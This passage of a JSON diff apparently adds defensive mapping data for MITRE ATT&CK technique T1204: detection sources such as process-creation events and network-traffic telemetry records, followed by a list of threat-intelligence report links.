"https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html", NaN + ] + }, + { + "technique_id": "T1204", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Anti-virus" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Anti-virus" + ], + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container start", + "description": "A container was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "container" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://securelist.com/muddywater/88059/", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + 